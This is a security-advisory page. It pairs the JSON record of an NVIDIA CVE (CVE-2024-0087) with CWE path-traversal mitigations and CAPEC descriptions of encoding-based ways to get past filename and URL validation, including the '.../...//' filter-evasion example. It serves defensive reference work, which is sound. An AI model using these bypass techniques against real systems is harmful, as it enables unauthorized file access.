  "modified": "2024-05-14T15:32:51Z",
  "published": "2024-05-14T15:32:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0087"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5535"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.

Mitigation
Architecture and Design Operation
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation
Implementation

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).

Mitigation
Installation Operation

Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.

Mitigation
Operation Implementation

If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Mitigation
Testing

Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

CAPEC-13: Subverting Environment Variable Values

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

CAPEC-267: Leverage Alternate Encoding

An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.

CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

CAPEC-72: URL Encoding

This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-78: Using Escaped Slashes in Alternate Encoding

This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.

CAPEC-79: Using Slashes in Alternate Encoding

This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.

CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic

This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.